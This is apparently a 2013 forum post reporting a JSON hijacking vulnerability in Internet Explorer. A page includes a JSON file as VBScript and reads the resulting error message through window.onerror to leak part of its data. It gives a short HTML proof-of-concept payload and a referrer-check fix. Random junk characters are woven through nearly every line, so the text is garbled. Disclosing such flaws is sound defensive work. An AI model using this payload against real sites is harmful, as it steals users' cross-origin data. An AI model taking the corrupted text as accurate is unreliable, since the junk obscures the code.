简要描述:
9 F2 c7 O* c8 R+ d3 w3 Q
) X, `) T$ k" e8 }$ i5 [由于某些资源容器对数据处理不当导致json劫持漏洞.
4 d7 j7 T" e j3 ?详细说明:
5 @, Z9 X( J! N由于ie支持vbscript,所以script元素可以指定成vbscript语言:6 x, N: Z( U- Y
<script language=vbscript></script>" y) C' e! o7 S! d2 u% r
" _& y: A9 N* o0 o: j当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
$ K7 F$ t, L6 W. J, u: x, ^- Y漏洞证明:2 S, F1 l8 [6 H: H' n) {( ?
<script>/ H( w" g- N4 l" L
window.onerror=function(_){3 I% r! R, ~* _) t4 R4 X% `
alert(_)
" ~. q* Y4 \$ |# ^, X}' `( S. c' o* C7 N& Q- j" R3 d z5 \
</script>" n/ j. N! E) n( ?( V
<script language=vbscript src=1.json></script>9 b) S( I/ y d) J$ E
: s3 _5 k7 M/ S, _4 @' c6 ?1 e# J
- T7 ?' A n$ l5 \4 q1 B3 a# H% S' y1.json:
7 d; j" o% ^% o6 I9 W. q, L[{"name":"sogili","age":19}]
1 `+ j, v6 r7 x2 A/ D. r# p) Z; ]3 o修复方案:
4 k" u* T( S0 Y3 }网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对